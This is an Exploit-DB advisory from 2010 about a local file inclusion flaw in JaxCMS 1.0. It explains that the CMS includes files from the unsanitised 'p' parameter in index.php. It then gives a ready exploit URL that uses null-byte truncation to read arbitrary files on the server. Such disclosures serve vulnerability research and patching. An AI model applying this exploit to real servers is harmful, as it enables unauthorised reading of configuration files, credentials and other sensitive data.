JaxCMS 1.0 – Local File Inclusion

  • 作者: Hamza 'MizoZ' N.
    日期: 2010-02-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11359/
  • /*
    
    Name : JaxCMS (p) Local File Include
    WebSite : http://www.pixiescripts.com/
    
    Author : Hamza 'MizoZ' N.
    Email : mizozx@gmail.com<mailto:mizozx@gmail.com>
    
    Greetz : Zuka !
    
    */
    
    The vulnerability is in the get $_GET['p'] , the index.php include '/pages/'.$_GET['p'].'.php'
    
    So we can read any file in the server .
    
    EXPLOIT :
    
    http://server/[JaxCMS PATH]/index.php?p=[LFI]%00